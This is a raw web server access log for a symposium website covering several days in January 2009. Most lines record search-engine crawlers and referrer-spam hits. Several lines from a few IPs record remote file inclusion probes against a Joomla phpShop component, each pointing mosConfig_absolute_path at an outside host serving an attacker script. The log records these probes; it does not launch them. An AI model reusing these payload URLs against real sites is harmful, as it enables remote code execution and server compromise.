82.118.206.180 - - [15/Jan/2009:11:07:35 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
82.118.206.180 - - [15/Jan/2009:11:07:36 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
82.118.206.180 - - [15/Jan/2009:11:07:42 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
58.61.164.40 - - [15/Jan/2009:14:08:01 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
66.232.111.94 - - [15/Jan/2009:14:26:10 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.232.111.94 - - [15/Jan/2009:14:26:10 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.232.111.94 - - [15/Jan/2009:14:26:10 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
208.80.194.48 - - [15/Jan/2009:14:46:23 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 1.57.1 ; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
74.6.22.90 - - [15/Jan/2009:18:09:26 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.90 - - [15/Jan/2009:18:09:27 -0500] "GET /logs/access.log HTTP/1.0" 200 351319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
117.23.205.226 - - [15/Jan/2009:20:10:10 -0500] "GET / HTTP/1.0" 200 310 "http://bgkoork.angelfire.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" 0 www.geil-symposium.com
117.23.205.226 - - [15/Jan/2009:20:10:11 -0500] "GET / HTTP/1.0" 200 310 "http://bgkoork.angelfire.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" 0 www.geil-symposium.com
117.23.205.226 - - [15/Jan/2009:20:10:13 -0500] "GET / HTTP/1.0" 200 310 "http://bgkoork.angelfire.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" 0 www.geil-symposium.com
117.23.205.226 - - [15/Jan/2009:20:10:15 -0500] "GET / HTTP/1.0" 200 310 "http://bgkoork.angelfire.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1" 0 www.geil-symposium.com
81.103.18.135 - - [15/Jan/2009:20:10:31 -0500] "GET / HTTP/1.0" 200 310 "http://nrozoee.tripod.com/index.html" "Opera/9.0 (Windows NT 5.1; U; en)" 0 www.geil-symposium.com
81.103.18.135 - - [15/Jan/2009:20:10:47 -0500] "GET / HTTP/1.0" 200 310 "http://nrozoee.tripod.com/index.html" "Opera/9.0 (Windows NT 5.1; U; en)" 0 www.geil-symposium.com
81.103.18.135 - - [15/Jan/2009:20:10:57 -0500] "GET / HTTP/1.0" 200 310 "http://nrozoee.tripod.com/index.html" "Opera/9.0 (Windows NT 5.1; U; en)" 0 www.geil-symposium.com
81.103.18.135 - - [15/Jan/2009:20:11:03 -0500] "GET / HTTP/1.0" 200 310 "http://nrozoee.tripod.com/index.html" "Opera/9.0 (Windows NT 5.1; U; en)" 0 www.geil-symposium.com
193.47.80.36 - - [15/Jan/2009:22:37:01 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [15/Jan/2009:22:37:01 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
72.30.78.246 - - [15/Jan/2009:23:56:46 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.78.246 - - [15/Jan/2009:23:56:47 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.19.89.98 - - [16/Jan/2009:00:13:18 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://owell.us/var/https/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
67.19.89.98 - - [16/Jan/2009:00:13:18 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://owell.us/var/https/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
208.80.194.52 - - [16/Jan/2009:02:40:27 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; ZangoToolbar 4.8.3; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; InfoPath.2)" 0 www.geil-symposium.com
123.214.171.51 - - [16/Jan/2009:03:54:10 -0500] "GET /logs/error.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.svbbauvertrag.de/safe1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
123.214.171.51 - - [16/Jan/2009:03:54:11 -0500] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.svbbauvertrag.de/safe1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
123.214.171.51 - - [16/Jan/2009:03:54:11 -0500] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.svbbauvertrag.de/safe1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" 0 www.geil-symposium.com
66.235.124.38 - - [16/Jan/2009:08:02:44 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [16/Jan/2009:08:02:44 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
24.61.217.227 - - [16/Jan/2009:09:53:16 -0500] "GET / HTTP/1.0" 200 310 "http://reiepob.hostparq.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1" 0 www.geil-symposium.com
24.61.217.227 - - [16/Jan/2009:09:53:16 -0500] "GET / HTTP/1.0" 200 310 "http://reiepob.hostparq.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1" 0 www.geil-symposium.com
24.61.217.227 - - [16/Jan/2009:09:53:16 -0500] "GET / HTTP/1.0" 200 310 "http://reiepob.hostparq.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1" 0 www.geil-symposium.com
24.61.217.227 - - [16/Jan/2009:09:53:17 -0500] "GET / HTTP/1.0" 200 310 "http://reiepob.hostparq.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1" 0 www.geil-symposium.com
85.214.39.188 - - [16/Jan/2009:09:54:10 -0500] "GET / HTTP/1.0" 200 310 "http://lloaaij.5nxs.com/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" 0 www.geil-symposium.com
85.214.39.188 - - [16/Jan/2009:09:54:25 -0500] "GET / HTTP/1.0" 200 310 "http://lloaaij.5nxs.com/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" 0 www.geil-symposium.com
72.221.124.178 - - [16/Jan/2009:09:55:15 -0500] "GET / HTTP/1.0" 200 310 "http://lloaaij.5nxs.com/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" 0 www.geil-symposium.com
72.221.124.178 - - [16/Jan/2009:09:55:16 -0500] "GET / HTTP/1.0" 200 310 "http://lloaaij.5nxs.com/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" 0 www.geil-symposium.com
220.181.61.230 - - [16/Jan/2009:10:19:06 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "-" 0 www.geil-symposium.com
220.181.61.230 - - [16/Jan/2009:10:19:16 -0500] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
208.80.194.36 - - [16/Jan/2009:17:38:05 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; SpamBlockerUtility 4.8.4)" 0 www.geil-symposium.com
38.99.13.124 - - [16/Jan/2009:18:26:43 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
72.30.142.179 - - [16/Jan/2009:19:50:17 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.179 - - [16/Jan/2009:19:50:17 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.179 - - [16/Jan/2009:19:50:17 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
203.209.252.68 - - [17/Jan/2009:05:09:41 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [17/Jan/2009:05:09:52 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
79.172.67.64 - - [17/Jan/2009:07:34:40 -0500] "GET / HTTP/1.0" 200 310 "http://wodjapp.myd.net/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
79.172.67.64 - - [17/Jan/2009:07:34:41 -0500] "GET / HTTP/1.0" 200 310 "http://wodjapp.myd.net/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
79.172.67.64 - - [17/Jan/2009:07:34:41 -0500] "GET / HTTP/1.0" 200 310 "http://wodjapp.myd.net/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
69.249.247.249 - - [17/Jan/2009:07:34:42 -0500] "GET / HTTP/1.0" 200 310 "http://nakuoud.myd.net/index.html" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" 0 www.geil-symposium.com
79.172.67.64 - - [17/Jan/2009:07:34:42 -0500] "GET / HTTP/1.0" 200 310 "http://wodjapp.myd.net/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
69.249.247.249 - - [17/Jan/2009:07:34:43 -0500] "GET / HTTP/1.0" 200 310 "http://nakuoud.myd.net/index.html" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" 0 www.geil-symposium.com
69.249.247.249 - - [17/Jan/2009:07:34:44 -0500] "GET / HTTP/1.0" 200 310 "http://nakuoud.myd.net/index.html" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" 0 www.geil-symposium.com
69.249.247.249 - - [17/Jan/2009:07:34:44 -0500] "GET / HTTP/1.0" 200 310 "http://nakuoud.myd.net/index.html" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" 0 www.geil-symposium.com
82.118.206.180 - - [17/Jan/2009:08:11:48 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
82.118.206.180 - - [17/Jan/2009:08:11:48 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
82.118.206.180 - - [17/Jan/2009:08:11:49 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
66.249.71.105 - - [17/Jan/2009:09:55:15 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.104 - - [17/Jan/2009:09:55:15 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.103 - - [17/Jan/2009:09:55:15 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.235.124.38 - - [17/Jan/2009:09:56:23 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [17/Jan/2009:09:56:23 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.80.194.36 - - [17/Jan/2009:15:15:36 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12) T-Mobile_Atlas" 0 www.geil-symposium.com
61.135.249.209 - - [18/Jan/2009:02:47:06 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
61.135.249.209 - - [18/Jan/2009:02:47:15 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
64.128.171.4 - - [18/Jan/2009:07:02:54 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" 0 www.geil-symposium.com
64.128.171.4 - - [18/Jan/2009:07:02:54 -0500] "GET / HTTP/1.1" 200 326 "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" 0 www.geil-symposium.com
67.195.37.120 - - [18/Jan/2009:09:19:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.120 - - [18/Jan/2009:09:19:56 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.71.103 - - [18/Jan/2009:09:48:57 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.104 - - [18/Jan/2009:09:48:57 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
208.80.194.56 - - [18/Jan/2009:11:10:12 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; yplus 5.3.04b)" 0 www.geil-symposium.com
61.247.221.43 - - [18/Jan/2009:11:20:35 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
61.247.221.43 - - [18/Jan/2009:11:20:35 -0500] "GET / HTTP/1.1" 200 326 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
68.43.246.23 - - [18/Jan/2009:14:09:35 -0500] "GET / HTTP/1.0" 200 310 "http://meeubob.tripod.com/index.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
68.43.246.23 - - [18/Jan/2009:14:09:39 -0500] "GET / HTTP/1.0" 200 310 "http://meeubob.tripod.com/index.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
68.43.246.23 - - [18/Jan/2009:14:09:43 -0500] "GET / HTTP/1.0" 200 310 "http://meeubob.tripod.com/index.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
68.43.246.23 - - [18/Jan/2009:14:09:45 -0500] "GET / HTTP/1.0" 200 310 "http://meeubob.tripod.com/index.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
77.35.99.210 - - [18/Jan/2009:14:09:50 -0500] "GET / HTTP/1.0" 200 310 "http://kzdyape.tripod.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" 0 www.geil-symposium.com
77.35.99.210 - - [18/Jan/2009:14:09:51 -0500] "GET / HTTP/1.0" 200 310 "http://kzdyape.tripod.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" 0 www.geil-symposium.com
77.35.99.210 - - [18/Jan/2009:14:09:53 -0500] "GET / HTTP/1.0" 200 310 "http://kzdyape.tripod.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" 0 www.geil-symposium.com
77.35.99.210 - - [18/Jan/2009:14:09:58 -0500] "GET / HTTP/1.0" 200 310 "http://kzdyape.tripod.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" 0 www.geil-symposium.com
38.99.13.124 - - [18/Jan/2009:14:24:59 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.46 - - [18/Jan/2009:14:58:36 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) Netscape/8.0.3.4" 0 www.geil-symposium.com
38.99.13.124 - - [18/Jan/2009:15:52:05 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [18/Jan/2009:19:19:38 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [18/Jan/2009:20:43:20 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [19/Jan/2009:03:16:00 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.111.154.15 - - [19/Jan/2009:04:19:07 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [19/Jan/2009:04:19:07 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
66.235.124.38 - - [19/Jan/2009:05:02:57 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [19/Jan/2009:05:02:57 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
58.61.164.40 - - [19/Jan/2009:08:47:36 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
38.99.13.124 - - [19/Jan/2009:09:42:24 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Jan/2009:11:17:08 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Jan/2009:11:17:08 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [19/Jan/2009:12:21:59 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [19/Jan/2009:12:22:00 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [19/Jan/2009:12:22:01 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [19/Jan/2009:12:54:11 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.33 - - [19/Jan/2009:13:53:21 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar 4.4.5.0; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
72.30.142.164 - - [19/Jan/2009:16:32:47 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [19/Jan/2009:16:32:48 -0500] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.164 - - [19/Jan/2009:16:32:48 -0500] "GET /logs/ HTTP/1.0" 200 434 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
89.218.85.18 - - [19/Jan/2009:19:39:26 -0500] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 www.geil-symposium.com
89.218.85.18 - - [19/Jan/2009:19:39:26 -0500] "GET /logs/error.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 www.geil-symposium.com
89.218.85.18 - - [19/Jan/2009:19:39:26 -0500] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" 0 www.geil-symposium.com
89.218.85.18 - - [19/Jan/2009:19:40:27 -0500] "GET /logs/error.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" 0 www.geil-symposium.com
89.218.85.18 - - [19/Jan/2009:19:40:27 -0500] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" 0 www.geil-symposium.com
89.218.85.18 - - [19/Jan/2009:19:40:28 -0500] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" 0 www.geil-symposium.com
208.111.154.16 - - [19/Jan/2009:20:18:11 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.46 - - [20/Jan/2009:02:28:50 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 3.0; ZangoToolbar 4.8.3)" 0 www.geil-symposium.com
64.246.165.10 - - [20/Jan/2009:10:15:43 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.165.10 - - [20/Jan/2009:10:15:43 -0500] "GET / HTTP/1.1" 200 326 "http://whois.domaintools.com/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
208.111.154.15 - - [20/Jan/2009:10:43:18 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [20/Jan/2009:10:43:18 -0500] "GET /Venue.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [20/Jan/2009:11:26:48 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
